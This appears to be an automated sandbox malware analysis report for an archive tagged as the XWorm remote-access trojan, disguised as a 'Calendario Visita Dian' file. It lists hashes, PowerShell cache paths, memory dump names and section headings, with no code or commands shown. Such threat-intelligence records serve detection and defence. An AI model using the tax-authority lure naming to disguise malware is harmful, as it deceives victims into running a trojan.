MD5	46df134b452e925e8307e85f37a1a97d
SHA1	76bb98af81fa1807d80b36d015cba4523c41006e
SHA256	75507161e4ffe4541fa307fe3ba950a792a1bb7cbfb581c3835f2b473eb80ec5
SHA512	3aef14ecab626896802137e005a800775d8df2bee3be027941e03ee642c6ec422a3e30e3e669603637be87a48a3fa006c88be0af344c023b33f37bdd68839b2a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5	a26df49623eff12a70a93f649776dab7
SHA1	efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256	4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512	e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	2114288fdfc8e55f47611663569c81ab
SHA1	b90e27b1223903c32b629ba98f237ff177ccce85
SHA256	5d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a
SHA512	997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d

memory/1056-133-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/1056-134-0x00007FFCA8C23000-0x00007FFCA8C25000-memory.dmp

memory/1056-136-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

Sample ID	240612-jecewavblb
Target	12062024_0734_06062024_Calendario Visita Dian.tar
SHA256	374728f8d9b03e9cf76bc3c4355afe1f968a0efd8bd20b7f88946bc7ef91e3f2
Tags	execution xworm rat trojan

Malware Analysis Report

2024-09-11 14:48

Table of Contents

Analysis Overview

Threat Level: Known bad

Malicious Activity Summary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files